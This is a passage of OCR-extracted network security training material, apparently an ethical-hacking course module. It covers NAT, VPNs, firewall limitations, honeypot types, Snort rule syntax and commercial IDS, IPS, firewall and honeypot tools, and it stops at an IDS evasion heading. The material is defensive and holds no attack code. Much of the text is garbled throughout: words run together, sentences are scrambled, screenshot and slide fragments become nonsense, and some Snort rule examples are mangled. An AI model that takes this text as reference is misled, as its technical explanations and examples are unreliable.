Create a fixed mappingfrominternaladdresses visibleaddresses
but use a
portmappingso that multiple
internalmachines
use the same externaladdress,
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Dynamically
allocatean externalhostaddress
andportpair eachtime an internalhost
initiates a connection. Thismakesthe most efficientpossible
use of the externalhost
addresses.
Advantages
Network addresstranslationhelpsto enforcethe firewall’s
control over outbound
connections.
=
incoming
It restricts
traffic
allows
packets
initiatedfromthe inside,part
current
and
interactio
only that are of a
=
Ithelps hidethe internalnetwork'sconfiguration
and thuslowersthe successrate of
attackson thenetworkor system.
Disadvantages
‘=
hasto guesshow long
TheNAT system it shouldkeep
a particular
translation,
whichis
not always
possible.
TheNATinterfereswith encryption
andauthenticationsystems
to ensure the security
of
the data.
allocation
Dynamic ofportsmayinterfere filtering
with packet
ical andCountermensores
Mackin ©by E-Comel
Copyright
Virtual PrivateNetwork
eis
secure
usedforthe
and encryption
‘encapsulation untrusted
network,
transmission
of sensitiveinformation
over an using
Ieestablches
a use connectionthrough
vitual point-to-point the ofdedicated
connections
thecomputing
Cony device
u nningtheVPNsoftwar
Virtual PrivateNetwork
A virtual privatenetwork(VPN) is a networkthat provides
secure access to the private network
through the Internet.VPNsare usedfor connecting widearea networks(WAN). They allow
computers on one networkto connect to computers on anothernetwork.They a re usedfor the
secure transmissionof sensitive informationover an untrusted networkvia encapsulation and
encryption. Theyemploy encryption and integrityprotection,enabling you to use 2 public
networkas a privatenetwork.A VPN performs and decryption
encryption outsidethe packet
filteringperimeter to allowthe inspection of packetscomingfromother sites. It establishes a
connection
virtual point-to-point
encapsulates packets
through the use of dedicatedconnections. A VPN also
sent over the Internet.It combinesthe advantages
networks.VPNshaveno relationto firewalltechnology,
private
of both public
butfirewallsare convenient for
and
VPNfeatures
adding a s they
helpin providing secure remote services. Thecomputing device
running only
access
the VPNsoftwarecan
adopt following
All VPNsthat run over principles:
the Internet
theVPN.
the
=
the
traffic
Encrypts
Checks
=
=
integrityfor
Encapsulates
protection
new packets,
whichare sent across the Internetto some destinationthat
reverses the encapsulation
Checks
the integrity
Decrypts
thetrafficeventually
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Advantages
=
APN hidesall the trafficthat flowsover it, ensuresencryption,
and protects
datafrom,
snooping.
=
remote accessfor protocols
It provides whileavoiding attackers
fromthe Internet at
large.
Disadvantages
‘=
As the VPN runs on a public the user will bevulnerable
network, to an attackon the
destinationnetwork.
ical andCountermensores
Mackin ©by E-Comel
Copyright
FirewallLimitations
‘Afrenal
cannot doanything
eign
thenetwork or faulty
configuration
felis tunneled
unbleo understand wai
Firewall Limitations
Althoughfirewalls
a re essential
to yoursecurity strategy, theyhavethe following limitations:
=
Firewallscan restrict users fromaccessing valuableservices suchas FTP, Telnet, NS,
etc,,andthey sometimesrestrict Internet access as well
Thefirewallcannot preventinternalattacks(backdoor) e.g.,a disgruntled
i n a network,
employee whocooperates with theexternalattacker.
Thefirewallfocusesi ts security at a singlepoint,whichmakesother systems withinthe
networkproneto security
attacks.
A bottleneckcouldoccur if allthe connections passthrough
the firewall
Thefirewallcannot protectthenetworkfromsocialengineeringanddata-driven
attacks
whereby the attackersendsmaliciouslinksandemailsto employeesinsidethe network.
If externaldevicessuchas laptops, mobile phones, portable
hard drives, etc, are
already infectedandconnected to the network,then a firewallcannot protectthe
networkfromthesedevices,
Thefirewall is unableto adequately protectthe networkfrom all typesof zero-day
viruses that tryto bypassit.
A
A
firewallcannot do anything
not
ifthe networkdesign andconfiguration
firewall is an alternativeto antivirus or antimalwaretools.
is faulty.
A
A
firewalldoesnot blockattacksfroma higher
firewalldoesnot preventattacksoriginating
leveloftheprotocol
stack.
fromcommon portsandapplications
A
A
firewalldoesnot preventattacksfromdial-inconnections.
firewallis unableto understandtunneledtraffic.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Honeypot
‘A
honeypot
an information
site resource that set uptoattrac and
expresy ap people
whoate
'A ort
access
or
monitor early
honeypot
cn lo
warnings
attempts an These
atacer'skeytroke. could be
Honeypot
honeypot
‘A systemon the Internet intendedto attract and trapthosewho
is @ computer
attemptunauthorized of the hostsystemto penetratea n organization's
or illicitutilization
network.It is a fakeproxyrun to frameattackersbylogging trafficthroughit andthen sending
complaints to thevictims’ISPs.It hasno authorized
activityor productionvalue, and any traffic
to it is likelya probe, attack,or compromise.Wheneverthere is any interaction with a
honeypot, it is most likely to be malicious.Honeypotsare unique; they do not solvea specific
problem. Instead, theyare a highlyflexibletools with manydifferent securityapplications.
Honeypots helpin preventing attacks,detectingattacks, and informationgathering and
research, A honeypot can logportaccessattempts or monitor an attacker'skeystrokes; these
couldbeearly
a
warningsof more concertedattack.It requires a considerable
to maintain a honeypot.
amount of effort
12.17:
Figure of Honeypot
Example
ical andCountermensores
Mackin ©by E-Comel
Copyright
of Honeypots
Types
of
honoypots
bazed
on
‘Classification
their
design criteria
of Honeypots
‘Types
Honeypots into the following
are classified typesbasedon their designcriteria:
+
Low-interaction Honeypots
Low-interaction honeypots emulateonlya limitednumber of services and applications
of a targetsystem or network.If the attackerdoessomething that the emulationdoes
not expect,the honeypot will simply
generatea n error. They
capture limitedamounts of
information, Le,, mainlytransactionaldata,and some limited interactions. These
honeypots
cannot be compromised completely.
They a re set to collect higher-level
informationaboutattackvectors suchas network probes and worm activities. Some
examples KFSensor,
are Specter, andHoneytrap.
KFSensor is a low-interaction honeypot usedto attract and identify penetrations. It
implements vulnerablesystem services and Trojans to attract hackers.Thishoneypot
be usedto monitor all TCP,
‘can UDP,and ICMPportsand services. KFSensoridentifies
andraisesalertsabout portscanning andDoSattacks.
A honeytrap is a low-interaction honeypot usedto observeattacksagainst TCPandUDP
services. It runs as a daemonandstarts server processes dynamically on requested
ports.Attackersare trickedinto sending responsesto the honeytrap server process.The
data that is received bythe honeypot is concatenated into a stringand storedi n a
databasefile.Thisstringis calledtheattackstring.Honeytraps parseattackstringsfor a
‘command requesting the server to downloada file fromanotherhosti n the network.If
such a commandis detected,the server tries to access the corresponding file
automatically. It supports onlyFTP and TFTP protocols. It also identifiesand logs
HTTP_URIs.
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Medium-
interactionHoneypots
Medium-interaction honeypots simulatea realOSas well as applicationsandservices of
a targetnetwork,They providegreatermisconception of an OS than low-interaction
honeypots. Therefore, it is possibleto logand analyze more complex attacks.These
honeypots capture more usefuldata than low-interactionhoneypots. They can only
respond to preconfigured commands; the riskof intrusion increases. The
therefore,
main disadvantage of medium-interaction honeypotsis that the attackercan quickly
discoverthatthe system behavioris abnormal.Someexamples of medium-interaction
honeypots includeHoneyPy, Kojoney2, andCowrie.
Kojoney2 is a medium-interaction honeypotthat emulatesa realSSHenvironment. This,
honeypot listenson port 21 for incomingSSHconnections. If a connection requestis
initiated,
Kojoney2 will verify
users againstan internallist of fake users. Usually,
the
connections are accepted bygranting a ccessto the SSHshell.It simulates manyshell
commands to trickattackers.Using Kojoney2,attackerscan downloadfiles usingwget
andcurlcommands.
High-Interaction
Honeypots
Unliketheir low- andmedium-interaction high-interaction
counterparts, honeypots do
not emulateanything; theyrun actualvulnerableservices or softwareon production
systemswith real OSand applications. Thesehoneypots simulateall services and
applications of a targetnetwork.They c an becompletelycompromisedbyattackers to
gain full access to the system i n a controlledarea. They
capturecomplete information
aboutan attackvector suchas attacktechniques,tools,andintent. Thehoneypotized
systemIs more prone to infection,as attack attemptscan be carriedout on real
production systems.
honeynet
‘A is a primeexample of a high-interaction
honeypot. It is neithera product
nor a softwaresolutionthat a user installs,Instead, it is an architecture—an entire
network of computers designedto attack.The idea is to havean architecture that
creates a highly controllednetworkwith real computers running real applications,in
andlogged.
whichall activities are monitored
guys―
“Bad find,attack,andbreakinto thesesystems through theirown initiative. When
theydo, theydo not realizethat theyare i n a honeynet. Withoutthe knowledge of the
attackers, all theiractivities andactions,fromencrypted SSHsessionsto emailand file
uploads, are captured byinserting kernelmodulesinto their systems.
the
‘At same time,the honeynet controlsthe attacker'sactivity.
Honeynets do this by
usinga honeywall gateway, whichallowsinboundtrafficto the victim'ssystems but
controlsthe outboundtraffic usingintrusion prevention technologies.
Thisgivesthe
attackerthe flexibility
to interact with the victim's systemsbut prevents
the attacker
fromharming othernon-honeynet computers.
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
PureHoneypots
Purehoneypots emulatethe real production They
networkof a targetorganization.
cause attackersto devote their time and resources toward attacking
the critical
productionsystemof the company,Attackersuncover anddiscoverthe vulnerabilities
andtriggeralertsthat help
network administrators early
to provide warningsof attacks
andhencereducethe riskof an intrusion.
Honeypotsare classified into the followingtypesbasedon their deployment strategy:
Production Honeypots
Productionhoneypots are deployed insidethe production network of the organization
‘along
with other production servers. Although suchhoneypots improvetheoverallstate
of securityof the organization, theyeffectively captureonlya limited amount of
informationrelatedto the adversaries. Suchhoneypots fall underthe low-interaction
honeypot categoryand are extensively employed by largeorganizations and
corporations. As production honeypots are deployed internally,theyalsohelpto find
internalflawsandattackerswithin an organization,
‘out
=
Research Honeypots
Research honeypots are high-interaction honeypots primarily deployed by research
institutes,governments, or militaryorganizations to gain detailedknowledge aboutthe
actions of intruders. Byusingsuchhoneypots, security analysts can obtainin-depth
informationabouthow an attackis performed, vulnerabilitiesare exploited, andattack
techniques andmethodsare usedbytheattackers. Thisanalysis, i n turn, can helpan
organization to improveattack prevention, detection, and security mechanisms and
develop a more secure network infrastructure.
Themain drawback of researchhoneypots is that theydo not contributeto thedirect
securityof the company. If a company is lookingto improve its production
infrastructure, it should optforproduction honeypot.
Honeypotsare classified into the followingtypes based on their deception technology:
=
MalwareHoneypots
Malwarehoneypots are usedto trapmalwarecampaigns or malwareattempts over the
networkinfrastructure. Thesehoneypots are simulatedwith knownvulnerabilitiessuch
as outdatedAPIs, vulnerableSMBvi protocols, etc.,and theyalsoemulatedifferent
Trojans, viruses, and backdoors that encourageadversaries to perform
exploitation
activities. Thesehoneypots lurethe attackeror malwareinto performingattacks, from
whichthe attackpattern,malwaresignatures, and malwarethreatactors can be
identifiedeffectively.
DatabaseHoneypots
Database honeypotsemploy fake databases
that are vulnerable database-
to perform
relatedattackssuchas SQLinjection
anddatabaseenumeration. Thesefakedatabases
trickthe attackersbymaking
themthink that thesedatabases
contain crucialsensitive
ical andCountermensores
Mackin ©by E-Comel
Copyright
information suchas credit carddetailsof all the customers and employee databases.
However,all the informationpresenti n the databaseare fake and simulated.Such
databases lure the attackerto perform attacks, with their vulnerabilities;
fromthe
attacks,
the attackpatternandthethreatactor’s TTP’s
towardsdatabaseattackscan be
effectively.
identified
‘Spam
Honeypots
‘Spam
honeypots specifically
targetspammerswhoabusevulnerableresources suchas
andopen proxies.Basically,
mail relays
‘open spamhoneypots consist of mail servers
that deliberately emailsfromanyrandomsource fromthe Internet.They
accept provide
crucial informationaboutspammersandtheir activities.
Email
Honeypots
Emailhoneypots are alsocalledemailtraps.They a re nothingbut fakeemailaddresses
that are specifically
usedto attract fakeand maliciousemailsfromadversaries. These
fakeemailIDswill be distributed across the open Internetanddarkweb to lurethreat
actors into performing various maliciousactivities to exploit the organization.
By
constantly monitoringthe incomingemails, the adversary’s
deception techniques
can be
identifiedbythe administrators andinternalemployees can bewarnedto avoidfalling
into such
Spider
email
traps.
Honeypots
Spiderhoneypots are alsocalledspider traps.Thesehoneypotsare specifically
designed
to trap web crawlers and spiders.Manythreatactors perform web crawling and
spideringto extract importantinformation from web applications. Suchcrucial
informationincludes URLs,contact details, directory
details,
etc. Spiderhoneypots are
employed to trapsuchadversaries. A fakewebsitewill beemulatedandpresented as a
legitimate
one. Threatactors attempting web crawling
to perform on suchtrapswill be
identifiedandblacklisted
Honeynets
are
Honeynetsnetworksof honeypots.
of the adversaries.Honeynets
capabilities
environmentalong
are in
They very effectivedetermining
are mostlydeployed
entire
in an isolatedvirtual the
with a combinationof vulnerable servers. The various TTPs
employed bydifferentattackersto enumerate and exploitnetworkswill be recorded,
andthis informationcan be very effectivei n determining
the complete capabilities
of
theadversary.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
@ | wore teaon
IDS,IPS,Firewall,and Honeypot
Solutions
The previoussection discussed role,andplacement
the function, of IDS,IPS,firewalls,
and
honeypots for securing networks.A numberof easy-to-use
and feature-enrichedsolutions
(hardware,software,or both) are available
forthe implementation of IDS,IPS,firewalls,and
honeypots. some commercially
Thissection discusses availablesolutionsthat simplify
the usage
ofIDS,IPS, andhoneypots.
firewalls,
Module2 1508
Page tical MakingandCountermensores
by
Copyright©
Comet
IntrusionDetectionTools: Snort
OEE Eee
Snort Rules
CEH
Snortrules
helpi n iferentitng between and
Snortrules
must becontained ona theSnortruleparser
come with wo lageal
Snortrules parts:
Module2 1502
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
SnortRules:RuleActions and IP Protocols
Rule
action tobe
(©Theruleacton
alerts a
performedthereto
Snortwhen'tfinds
(@Thereae threeavalableaction
a
beapplied
Actions
dlr
the metho athena ic
‘There
ae thre avaibleP protocols
that Snotsupports
oFsuspicious behavior
eo 13?
© wv
© ww
SnortRules:TheDirection Operator
and IP Addresses
Direction Operator
‘The
“©
Thisoperator
indicates
thedrection
ofinterestforthetaf raf an flowinether snl directionor
“©
ofa
GxampleSnort wing the bidirectional
operator
IP Addresses
TELIELEELiiifitniiti
18ley
|G Use te and
shatto
adress he port the le apes
a ny"tone the Pads
the keyword
of wthaCDR
18Useume addressesqualified netmask
|G ample a Ades Negationle:
Module2 1502
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
SnortRules:PortNumbers
|@ Baample
canbe
|@ Portr umbers
sted
ferent
ways,
with
range
operator"
(©Portrangesareindcates
ofa Port Negation
the
including
"an" pots, atc portdefintions,
por ranges,an bynegation
‘ation
Leeuoranyam>—amatesayasuame
conn
tom
ape
okpos
agg
am
MEUORtMe denon
LogTe>anyany->
TCP
__192.168:14/245000
any
going
to
pots
than
Log wate om port at or equal
0 500
|
IntrusionDetectionTools:SuricataandAlienVault®
OssIMâ„¢ (EH
intrusion
detection
intusion
Prevention
(5),
neteck
seenty
montorag
ofreatime
(NSM) (0),
nd
Intrusion DetectionTools
Intrusion detection tools detectanomalies.Thesetools,when running on a dedicated
workstation, read all network packets,reconstruct user sessions, and scan for possible
Intrusions bylooking
forattacksignaturesandnetworktrafficstatisticalanomalies.Moreover,
thesetoolsoffer real-time,
zero-dayprotectionfromnetworkattacksandmalicioustraffic,and
theypreventmalware, spyware,portscans,viruses, DoS,
andDDoS fromcompromising hosts,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Snort
Source:https://www.snort.org
Snortis an open-source networkintrusion detectionsystem capableof performing real:
time
traffic
analysis andpacket
andcontent searching/matching,
suchas bufferoverflows,
logging It can perform
on IP networks. protocol analysis
anditis usedto detecta varietyof attacksandprobes,
stealthport scans, CGI attacks, SMB probes, and OS
fingerprinting
attempts.It uses a flexibleruleslanguageto describetrafficthat it should
or that
collect pass,aswell asa detection
of
Uses Snort:
engine usesa modular plug-in
architectur
Straight
packet sniffersuchas tcpdump
Packetlogger(useful for networktrafficdebugging,
etc.)
©. Networkintrusion prevention system
Figure
af
12.18:Screenshot Snort
ical andCountermensores
Mackin ©by E-Comel
Copyright
SnortRules
Snort
Figure 12:19: output
Snort rules,
written for both protocol
analysis
and content searching
and matching,
shouldberobustandflexible.Therulesshouldbe“robust―:
thesystem
shouldmaintain
a hardcheckon the activities taking
of any potential
sufficiently
place
o n the network
and
intrusion attempt.Therulesshouldbe“flexible―:
compatible to act immediately
notifythe administrator
the systemmust be
and take necessary remedial measures
to thenature ofthe intrusion.
according
ical andCountermensores
Mackin ©by E-Comel
Copyright
Both flexibility
and robustness
can be achievedusing an easy-to-understand and
lightweight
rule-description
languagethat aids i n writing simple
Snortrules.Consider
the
©
following
primary
two
while
principles
writing
beyond
Snort
No written rule must extend a single
rules:
line;thus,rulesshouldbe short,
Each
to logical
precise,andeasy understand.
ruleshouldbedividedinto two sections:
* Theruleheader
* Theruleoptions
Theruleheadercontains the rule'saction,the protocol,the source anddestinationIP
addresses,the source anddestinationportinformation,andthe Classless Inter-Domain
Routing(CIDR) block.Theruleoptionsection includesalert messages i n addition to
informationaboutthe inspected partof the packet to determinewhetherto take any
ruleaction.
12.20:
Figure ofSnortr ules
Example
SnortRules: RuleActionsandIP Protocols
Therule headerstores a complete set of rulesto identify a packet anddeterminesthe
action to be performed or rule to be applied. It contains informationthat definesthe
who,where, and what of a packet, as well as what to do if a packet with all the
attributesindicatedin the ruleshouldshowup.Thefirstitem in a rule is the rule action,
whichtells Snort “what when it finds a packet
to do― that matchesthe rule criteria
Thereare fiveavailable defaultactions in Snort:alert,log,pass,activate,anddynamic.
Furthermore, if Snortis runningi n the inline mode, you haveadditionaloptions, which
includedropandreject.
The IP sendsdata from one systemto another via the Internet. It supports unique
addressing for every computer on a network.Organize data on the IP network into
packets. Eachpacket contains message data, source,destination, andmore.
Snortsupports threeavailableIPprotocols to tacklesuspicious behavior:
© TCP: TheTransmissionControl Protocol(TCP) is a partofthe IP. Itis used
to connect
two differenthostsandexchange databetweenthern.
Protocol(UDP)
UDP:TheUserDatagram is usedfor broadcasting
messages
over a
network.
ICMP:TheInternetControlMessage Protocol(ICMP)
for example,
ICMPi na networkto senderror messages, of
is a part the IP.TheOSuses
ical andCountermensores
Mackin ©by E-Comel
Copyright
SnortRules: andIP Addresses
DirectionOperator
DirectionOperator
Thisoperatorindicatesthe directionof interest for the traffic;
trafficcan floweither
ina directionor bidirectionally.
single
Example
a
of Snortrule usingthe BidirectionalOperator:
log 1192.168.1.0/24any <> 192.168.1.0/24 23
IPAddresses
‘Identify
theIPaddressand portthatthe ruleapplies
to
* Usekeyword"any'to definetheIP address
*
numeric
Use
addresses
qualified
with
IP a netmask
CIDR
‘+
Example
Address
alert
Negation
of IP Rule:
top 1192.168.1.0/24 any -> 192.168.1.0/24 112
(content: "|00 01 86 a5|"; msg: “externalmountd access"
SnortRules: Port Numbers
;)
Portnumbers ways,including
can be listedi n different theuse of"any" ports,static port
definitions, port ranges, and by negation. Port ranges are indicatedby the range
an the
operator Thedirection
"."
operator indicates orientation or direction
"-$>$" ofthe
ical andCountermensores
Mackin ©by E-Comel
Copyright
any trafficthat hasoriginated
raisedupon detecting outsidethe localnet usingthe
negationoperator.
Exampleof a Port Negation:
log tep any any -> 192.168.1.0/24 16000: 6010
Protocols Address
WP Action
LogUDPtraffic comingfrom anyportand
LOE
|
UDPanyany->
1:1024
||| ports
192.168-1.0/24
192.168.1.0/24
:5000
from
1to
4. timation ranging 1024
or to
lessthan equal5000
TCP
TCPanyany102:1024
Lee
Log >
400:
| TCP
192.168.1.0/24
traffic
ports ports
to
Log
Boingand from the well-known
greaterthanor equal
to400
Table ofa PortNegation
12.2:Examples
Suricata
Source:https://suricata-ids.org
Suricatais a robustnetworkthreatdetectionenginecapable of real-timeintrusion
detection(IDS),inline intrusion prevention (IPS),
network security monitoring (NSM),
andofflinepcapprocessing. It inspects the networktrafficusingpowerfulandextensive
rulesand a signature language, and it providespowerful supportfor the
Lua scripting
detectionof complex threats.With standardinputand outputformatssuchas YAML
andJSON, integrationswith existing toolssuchas SIEMs, Splunk,Logstash/Elasticsearch,
Kibana,andotherdatabases becomeeffortless.
Figure
12.21: of TippngPoin
Screenshot
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Alienvault®
ossimâ„¢
Source:https://www.alienvault.com
OSSIMâ„¢,
AlienVault® Open SourceSecurity
InformationandEventManagement (SIEM),
provides open-sourceSIEMcomplete
you with a feature-rich with event collection,
normalization,
andcorrelation
OSSIMprovides platform
a unified with manyessential capabilities
security suchas:
>
Asset discovery Behavioralmonitoring
©
©
Vulnerabilityassessmentand
intrusion detection
© SIEMevent correlation
Someadditional
intrusion detectiontoolsare listedbelow:
=
Security
SolarWinds (https://www.solarwinds.com)
EventManager
+
(https://vww.ossec.net)
OSSEC
+
IDS(https://www.zeek.org)
BrolDS/Zeek
ical andCountermensores
Mackin ©by E-Comel
Copyright
IntrusionDetectionToolsfor Mobile Devices
=s Taspector
‘Wil
YourNet
Module2 1514
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
Figure
12.2%
Screenshot
of2°S
Wifi Inspector
Source:https://play.
google.com
Wifi Inspectorallowsyou to findall the devicesconnected to the network(via both
wiredandWi-Ficonnections, including consoles,
TVs, PCs, tablets,and phones);
it gives
relevantdatasuchas the IP addresses, manufacturer names, devicenames, andMAC
addressesof connecteddevices.It alsoallowsyou to save a listof knowndeviceswith a
name andfindsintrudersi n a shortperiod,
‘custom
YourNet
12:24;Screenshot
Figure ofWifilaspector
ical
Mackin
and Copyright
©
by Countermensores E-Comel
WifiintruderDetect
Source:https://wifi-intruder-detect.en.aptoide.com
Wifi Intruder Detect helpsto find security leaks i n the Wi-Fi network Internet
connection. It allowsyou to detectan intruder
whois accessing
the network,Wi-Fi, or
Internet
without
your
consent,
connection
ical andCountermensores
Mackin ©by E-Comel
Copyright
Intrusion PreventionTools
United
‘AilenVaultD Security
"aM
Management®
(SDM) SecrtyNetworknso
tem
rventon
© ante
epee
ier
net
Theat
change revention
we emu Ope
_
(PR
cpberoam
nrusion Sytem
Intrusion PreventionTools
=
UnifiedSecurity
AlienVault® Management®
(USM)
Source:https://www.alienvault.com
AlienVaultUSM can perform threat detection,
incidentresponse,and compliance
management across cloud, and hybrid
on-premises, environments. It can be integrated
with AlienVault Open Threat Exchange (OTX), which is an open threat intelligence
with more than 100,000
‘community participantswhocontributeover 19millionthreat
indicatorsdaily
to protectthe networkfromintrusions.
ical andCountermensores
Mackin ©by E-Comel
Copyright
22.26Screenshot
Figure of AlenvauitUSM
Someadditionalintrusion prevention
toolsare listedbelow:
‘+
IBM Security (https://www.ibm.com)
NetworkIntrusion Prevention System
=
Cyberoam IntrusionPreventionSystem(https://www.cyberoam.com)
+
(https://www.mcafee.com)
McAfeeHost IntrusionPreventionfor Desktops
(https://www.cisco.com)
CiscoIntrusion PreventionSystems
CcheckPoint IPSSoftwareBlade(https://www.checkpoint.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Firewalls:ZoneAlarmFreeFirewall 2019and
ManageEngine Firewall Analyzer
Free
‘oneBlarm Firewall2019
‘ManegeEngin
Firewall
Analyzer
——
ed
Firewalls
Firewalls
Cork Pisanee ore
rutiimmtacon_© Wie
Firewalls provideessential protectionto computersagainstviruses, privacy threats,
objectionable content,hackers, andmalicious softwarewhenconnected to the Internet. A
firewallmonitors runningapplicationsthat accessthe network.It analyzes
downloads,raisesan
alertwhendownloading file,andstopsit frominfecting
a malicious a PC.
ZoneAlarm FreeFirewall2019
Source:https://www.zonealarm.com
ZoneAlarmFreeFirewall2019 prevents attackersand intrudersfrom accessingyour
system.It managesandmonitors all incomingand outgoingtrafficandshieldsthe
network from hackers, malware,and other online threats that may compromise
network privacy.It monitors programsfor suspicious behavior, spottingand stopping
new attacksthat bypass traditionalanti-virus protection.Moreover, it preventsidentity
theft byguarding
complete
your
data. your
privacy.Furthermore,
PCinvisibleonline.In addition,
tracks,
It alsoerases
it locksout attackers,
allowingyou to surfthe web i n
blocksintrusions,andmakesyour
it filtersout annoyingandpotentiallydangerous emails.
Features:
©
©
Two-way
firewall
monitorswell
outbound
traffic
that andblocks
Allowsusersto browsetheweb privately
inboundas as
usingthe FullStealthMode
© Identityprotection services help
to preventidentify
theft byguarding
crucialdataof
the users. It alsooffersPCprotectionanddataencryption
Publicnetworkprotection are other key
andwirelessnetworkprotection featuresof
thisfirewall
ical andCountermensores
Mackin ©by E-Comel
Copyright
©
quick
Provides
security
updates
real-time
12.27:
Screenshot
Firewall
‘ManageEngine
Figure
Analyzer
ZoneAlarm
PRO 2017
of FIREWALL
https://www.manageengine.com
Source:
ManageEngine Firewall Analyzer is an agent-less
loganalytics and configuration
management softwarethat helps network administratorsto understandhow the
bandwidthis beingusedin their network.ManageEngine FirewallAnalyzer
is vendor-
Check
andsupports
agnostic
Point,Cisco, all
nearly open-source andcommercialnetworkfirewallssuchas
Fortinet,
Juniper, andPaloAlto.
Features:
©.
©
and
ComplianceChange
UserInternet Activity
Management
Monitoring
© NetworkTrafficandBandwidthMonitoring
FirewallPolicy
Management
Real-timeVPNandProxy ServerMonitoring
NetworkSecurity Management
NetworkForensicAudits
Log
Analysis ical andCountermensores ©by E-Comel
Mackin Copyright
FirewallTrafficStatistics
DeviceName Received
>
CiscoPIX 28078
>
Paloaito ome
Someadditionalfirewallsolutionsare listedbelow:
=
pfSense (https://www.
pfsense.org)
=
Sophos (https://www.sophos.com)
XGFirewall
Comodo Firewall(https://personalfirewall.comodo.com)
PaloAlto NetworkWildfire(https://www-paloaitonetworks.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Firewallsfor Mobile Devices
|
Firewalls forMobile Devices
previously
Thefirewallsdiscussed are usedfor securing personal and networks.
computers
Similarly,
=
some
firewalls can secure mobile
Mobiwol:NoRootFirewall
devices.
Source:http://www.mobiwol.com
MobiwolNoRootFirewallhelps allow/block
to take controlof mobileapps, easily app
andblockbackground
connectivity, alertswhen new apps
app activity.It generates
access the Internet.
Features:
Automaticlaunches
on device
startup
Automaticallyidentifies
applications
currentlyinstalledon your mobiledevice
Identifiesandnotifieswhennewly
installedappsaccesstheweb
Setsallow/blockon a per-application
basis
background
Disables activityfor selectedapps
Module2 1519
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
12.28:ScreenshotofMebiwol:
Figure NoRootFrewal
Mobile Privacy
Shield
Source:https://shieldapps.com
Mobile PrivacyShieldis an application for peopleon the move, i.e., peoplewho store
necessary information on their smartphones and use their devicesfor banking,
shopping, business,and more. Mobile Privacy Shield’s
Privacy Advisor monitors
applicationpermissions,sorting them into three categories bythe privacy-risk level
Eachreporti s packed with detailedinformation anda responseis suggested per case.
Mobile PrivacyShieldcentralizesall permissions,allowing
you to review andassess their
validity
andneedconveniently. It alsoallowsyou to remove eachthreatfromwithinthe
interface.
12.20Screenshot
Figure ofMobilePrivacy
Shiela
Modul2 1520
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
NetPatch
Firewall
Source:https://firewall.netpatch.co
NetPatchFirewallis a full featuredadvancedAndroidno-root firewall,It can beusedto
fullycontrola mobiledevicenetwork.Using
NetPatch
Firewall,
you can create network
rulesbasedon apps, IP addresses,
domainnames, etc. Thisfirewall is designed
to
reducea mobiledevice'snetworktrafficandbattery
consumption, improvenetwork
andensure privacy.
security,
Features:
> Blocknetworkaccess perapp,screen on/off, (3G
Wi-Fi/mobile & 4G),
blockroaming.
© Shadowsocks
CustomDNS,
secure
change
proxy,
support
(a TCPandUDP betterVPNproxy)
your DNSserver, supportONSquery throughShadowsocks
proxy,andset the DNScachetime
Notify
whennew appsinstalled
Export/import
configure
Cer
System
Apps
m
|
a
LJ
&
a IN IN
| 12.3: Sereenshotof
Figure NetPateh
Firewall
ical andCountermensores
Mackin ©by E-Comel
Copyright
Tools:KFSensorand SPECTER
Honeypot
Tools
Honeypot
Honeypots
are securitytoolsthat allowthe security to monitor attackers’
community tricksand
exploits
bylogging to suchexploits
all theiractivityso that it can respond quicklybeforethe
attackerc an misuse or the system.
compromise
+
KFSensor
Source:http://wwrkeyfocus.net
KFSensor is a host-based to attract anddetecthackers
IDSthat acts as a honeypot and
worms bysimulating vulnerablesystemservices and Trojans. Byactingas a decoy
server, it can divert attacks from criticalsystemsand provide a higher level of
information
than
that and
NIDS
alone.
achievedusing firewalls
You can use KFSensori n a Windows-based environment. It includesmany
corporate
innovative and unique featuressuchas remote management, a Snort-compatible
signature engine, andemulations
ofWindows
networking
protocols.
ical andCountermensores
Mackin ©by E-Comel
Copyright
@vrsersorProtenionl-vtaton Ta
2822 wt Yes
CR me
RN sata
OTS,
crea
al
ree)
| ORR
— a iep Te See]
BT
3.9
Discard
ithe “Recent
Rec
2 11 7Daytime
<
3 Quoteotthe
chargen
319FTP Recent.
“Re
G212288iRecon
B
Be
tones
tc
SPECTER
Figure 12.32:
of
ScreenshotKFSensor
Source:http://w specter.com
SPECTER
is a honeypotor deception system.It simulatesa complete
systemand
provides
an appealing
targetto lure hackersaway from production It offers
systems.
typical
Internet services suchas SMTP, HTTP,andTELNET,
FTP,POP3, which appear
perfectly normalto attackers.However, it trapsattackersbytricking theminto leaving
some tracesthat showthat they hadconnected to a decaysystem that doesnone of the
thingsit appearsto but insteadlogs
everything andnotifiesthe appropriatepeople.
Furthermore, SPECTER automaticallyinvestigatesattackerswhile theyare still tryingto
breakin. It providesmassiveamounts of decoy decoy
content andgenerates programs
Automatedweekly
that do not leavetraces on the attacker'scomputer. onlineupdates
of the honeypot's content and vulnerabilitydatabasesallow the honeypotto change
regularlywithout user interaction.
ical andCountermensores
Mackin ©by E-Comel
Copyright
I
Pre a |
Ee |
Frama
Feat i Meise
Foal Soe oe ne
i
Piened
zones
|ioed
F
ed
oF)
cette
al|F
Fok
Peer Poo tant
F tna 2] ee ——
aren | Masai =
eee
honeypot
Someadditional toolsare listedbelow:
Figuee
12.55:
of Screenshot SPECTER
‘=
(https://www.atomicsoftwaresolutions.com)
HoneyBOT
=
(https://github.com)
MongoDB-HoneyProxy
+
Network(https://aithub.com)
ModernHoney
Honeyd
(http://www-honeyd.org)
Module
Page 2 1526 ti l
Macking
and ©by Countermeasures E-Comell
Copyight
ModuleFlow
IDS
Evading
The previoussections helped u s to understand IDS,IPS,theirrolesand functions,how they
protectyour networkfrom intruders, andthe various IDSsolutionsavailable.Eventhough IDS
thwart attemptsto breachthe networksecurity, attackers
c an still evadeIDS.Thissection
explains
various ways in whichattackers evadeIDS.
ical andCountermensores
Mackin ©by E-Comel
Copyright
IDSEvasionTechniques
Ed vsicodetation PolymericShallcode
EEd
cementation stack ASCH
